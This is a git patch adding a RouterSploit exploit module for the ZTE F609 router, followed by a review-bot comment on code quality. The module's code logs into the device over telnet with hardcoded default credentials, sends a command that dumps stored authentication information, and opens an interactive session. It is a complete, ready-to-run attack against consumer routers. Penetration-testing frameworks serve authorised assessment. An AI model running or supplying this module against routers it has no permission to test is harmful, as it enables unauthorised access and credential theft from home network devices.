From e60d10b21864a2f9c9a1e812e5ac5562558f6569 Mon Sep 17 00:00:00 2001
From: Riswanda N.S <root.devilscream@gmail.com>
Date: Sat, 18 Jun 2016 20:36:32 +0800
Subject: [PATCH] Adding ZTE F609 Config Disclosure exploit

---
 routersploit/modules/exploits/zte/f609_config_disclosure.py | 83 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 83 insertions(+)
 create mode 100644 routersploit/modules/exploits/zte/f609_config_disclosure.py

diff --git a/routersploit/modules/exploits/zte/f609_config_disclosure.py b/routersploit/modules/exploits/zte/f609_config_disclosure.py
new file mode 100644
index 0000000..bcb5c28
--- /dev/null
+++ b/routersploit/modules/exploits/zte/f609_config_disclosure.py
@@ -0,0 +1,83 @@
+import telnetlib
+
+from routersploit import (
+    exploits,
+    print_status,
+    print_success,
+    print_error,
+    mute,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for ZTE F609 Config Disclosure.
+    If the target is vulnerable it is possible to authenticate to the device"
+    """
+    __info__ = {
+        'name': 'ZTE F609 Config Disclosure',
+        'description': 'Module exploits ZTE F609 Config Disclosure. If the target is possible to authentiate to the device.',
+        'authors': [
+            'devilscream',  # routersploit module
+        ],
+        'references': [
+            'https://www.youtube.com/watch?v=YlUqPbhzJLk',
+        ],
+        'devices': [
+            'ZTE ZXHN F609',
+        ]
+    }
+
+    target = exploits.Option('', 'Target address e.g. 192.168.1.1')  # target address
+    username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
+    password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
+    config = "sendcmd 1 DB p DevAuthInfo"
+
+    def run(self):
+        try:
+            print_status("Trying to authenticate to the telnet server")
+            tn = telnetlib.Telnet(self.target, 23)
+            tn.expect(["Login: ", "login: "], 5)
+            tn.write(self.username + "\r\n")
+            tn.expect(["Password: ", "password"], 5)
+            tn.write(self.password + "\r\n")
+
+            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
+
+            if i != -1:
+                print_error("Exploit failed")
+            else:
+                if any(map(lambda x: x in res, ["#", "$", ">"])):
+                    print_success("Authentication successful")
+                    print_status("Displaying configuration:")
+                    tn.write(self.config + "\r\n")
+                    tn.interact()
+                else:
+                    print_error("Exploit failed")
+
+            tn.close()
+        except:
+            print_error("Connection error: {}:{}".format(self.target, 23))
+
+    @mute
+    def check(self):
+        try:
+            tn = telnetlib.Telnet(self.target, 23)
+            tn.expect(["Login: ", "login: "], 5)
+            tn.write(self.username + "\r\n")
+            tn.expect(["Password: ", "password"], 5)
+            tn.write(self.password + "\r\n")
+            tn.write(self.config + "\r\n")
+
+            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
+            tn.close()
+
+            if i != -1:
+                return False  # target is not vulnerable
+            else:
+                if any(map(lambda x: x in res, ["<DM name="])):
+                    return True  # target is vulnerable
+        except:
+            return False  # target is not vulnerable
+
+        return False  # target is not vulnerable
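Review bot: The bare `except:` that closes both `run()` and `check()` catches everything, including `KeyboardInterrupt` and ordinary coding errors, and reports it as a connection error (or as "not vulnerable" in `check()`), so a fault in the module itself looks the same as an unreachable or patched device and an assessment can record a false negative. Narrow it to `except Exception as err:` at most and include `err` in the message, and move `tn.close()` into a `finally:` so the telnet session is not left open when `expect()` or `write()` raises. `check()` has no docstring and is not passive: it logs in with the configured credentials and sends the `config` command before it looks at the login result, which should be stated, for example `"""Log in over telnet and send the config command; return True only if the reply contains '<DM name='."""`. The class docstring also has a stray `"` at the end of its second line, and the `description` string ("If the target is possible to authentiate to the device.") is garbled and should read like the docstring sentence.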
--
libgit2 0.26.0